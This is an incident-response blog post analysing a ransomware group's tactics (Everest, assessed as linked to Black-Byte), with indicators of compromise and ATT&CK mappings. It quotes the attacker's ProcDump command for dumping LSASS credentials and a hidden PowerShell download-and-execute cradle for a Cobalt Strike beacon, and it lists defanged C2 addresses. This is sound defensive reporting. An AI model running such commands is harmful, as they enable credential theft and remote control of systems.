Climbing Mount Everest: Black-Byte Bytes Back?

Authored by: Michael Mullen and Nikolaos Pantazopoulos

Summary

tl;dr

In the Threat Pulse released in November 2021 we touched on Everest Ransomware group. This latest blog documents the TTPs employed by a group who were observed deploying Everest ransomware during a recent incident response engagement.

In summary, we identified the following key TTPs:

  • Lateral Movement through Remote Desktop Protocol (RDP)
  • Gathering of internal IP addresses for hosts on the network
  • Local LSASS dumps
  • NTDS.dit dumps
  • Installation of Remote Access Tools for persistence

Everest Ransomware

Earlier reports [1] have linked Everest ransomware as part of the Everbe 2.0 family, which is composed of Embrace, PainLocker, EvilLocker and Hyena Locker ransomware. However, after recovering and analysing an Everest ransomware file, we assess with medium confidence that Everest ransomware is related to Black-Byte.

Everest TTPs

Lateral Movement

The threat actor was observed using legitimate compromised user accounts and Remote Desktop Protocol (RDP) for lateral movement.

Credential Access

ProcDump was used to create a copy of the LSASS process in order to access additional credentials. The following command was observed being executed:

C:\Users\<Compromised User>\Desktop\procdump64.exe -ma lsass.exe C:\Users\<Compromised User>\Desktop\lsass<victim’s domain name>.dmp, for example lsasscontoso.dmp.

A copy of the NTDS database was also created with a file name of ntds.dit.zip.

Defence Evasion

Throughout the incident the threat actor routinely removed tooling, reconnaissance output files and data collection archives from hosts.

Discovery

Network discovery was observed upon the compromise of a new host. This activity was primarily conducted via the use of netscan.exe, netscanpack.exe and SoftPerfectNetworkScannerPortable.exe. These tools allow network scans to identify further hosts of interest as well as building a target list for ransomware deployment.   

The output of these tools were saved as text files in the C:\Users\Public\Downloads\ directory. Examples of these have been included below:

  • C:\Users\Public\Downloads\subnets.txt
  • C:\Users\Public\Downloads\trustdumps.txt

Collection

The threat actor installed the WinRAR application on a file server which was then used to archive data ready for exfiltration.

Command and Control

Cobalt Strike was the primary command and control mechanism used by the threat actor. This was executed on hosts using the following command:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(<IP Address>/a'))

Additionally, a Metasploit payload was identified within the path C:\Users\Public\l.exe.

The following Remote Access Tools were also deployed by the threat actor as a secondary command and control method, in addition to added persistence with the tools being installed as a service

  • AnyDesk
  • Splashtop Remote Desktop
  • Atera

Exfiltration

The threat actor utilised the file transfer capabilities of Splashtop to exfiltrate data out of the network.

Impact

Everest’s action on objectives appears to focus on data exfiltration of sensitive information as well as encryption, commonly referred to as double extortion.

Indicators of Compromise

IOC (indicators of compromise) ValueIndicator TypeDescription
netscan.exeFile nameSoftPerfect Network Scanner
netscanpack.exeFile nameThis was unable to be analysed during the investigation.
svcdsl.exeFile nameSoftPerfect Network Scanner Portable
Winrar.exeFile namePopular archiving tool, which supportsencryption.
subnets.txtFile nameNetwork Discovery output file
trustdumps.txtFile nameNetwork Discovery output file
l.exeFile nameMetasploit payload
hxxp://3.22.79[.]23:8080/URLSite hosting Cobalt Strike beacon
hxxp://3.22.79[.]23:8080/aURLSite hosting Cobalt Strike beacon
hxxp://3.22.79[.]23:10443/ga.jsURLCobalt Strike C2
hxxp://18.193.71[.]144:10443/matchURLCobalt Strike C2
hxxp://45.84.0[.]164:10443/o6mJURLMeterpreter C2

Attribution

The recovered ransomware binary is attributed to (based on the ransomware note) the ‘Everest group’. However, after analysing it, we identified/attributed the sample to Black-Byte (C# variant instead of Go). It should be noted that the sample’s compilation timestamp does match the incident’s timeline.

Even though the sample’s functionality remains the same, we noticed that it does not download the key from a server anymore. Instead, it is (randomly) generated on the compromised host. In addition, the ransomware’s onion link is different.

Based on our findings, we cannot confirm if a different threat actor copied the source code of Black-Byte and started using it or if the Black-Byte have indeed started using again the C# ransomware variant.

MITRE ATT&CK®

TacticTechniqueIDDescription
Initial AccessExternal Remote ServicesT1133Initial Access was through an insecure external service
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001Threat actor utilised PowerShell to execute malicious commands
ExecutionCommand and Scripting Interpreter: Windows Command ShellT1059.003Threat actor utilised Windows Command Shell to execute malicious commands
Lateral MovementRemote Services: Remote Desktop ProtocolT1021.001Lateral movement was observed utilising RDP
PersistenceCreate or Modify System Process: Windows ServiceT1543.003Threat actor installed remote desktop software tools as services for persistence
Credential AccessOS Credential Dumping: LSASS MemoryT1003.001The tool Procdump was used to create a copy of the LSASS process
Credential AccessOS Credential Dumping: NTDST1003.003The NTDS.dit was copied
Defence EvasionIndicator Removal on Host: File deletionT1070.004Threat actor routinely deleted tooling and output
DiscoveryNetwork Service DiscoveryT1046Threat actor utilised numerous network discovery tools – Netscan and SoftPerfectNetworkScanner
CollectionArchive Collected Data: Archive via UtilityT1560.001Threat actor archived data using WinRAR
Command and ControlApplication Layer Protocol: Web ProtocolsT1071.001Cobalt Strike was implemented using HTTPS for C2 traffic
Command and ControlRemote Access SoftwareT1219Threat actor utilised remote access software – Anydesk, Splashtop and Atera
ExfiltrationExfiltration Over C2 ChannelT1041Data exfiltration was conducted using the Splashtop application
ImpactData Encrypted for ImpactT1486Data was encrypted for impact

References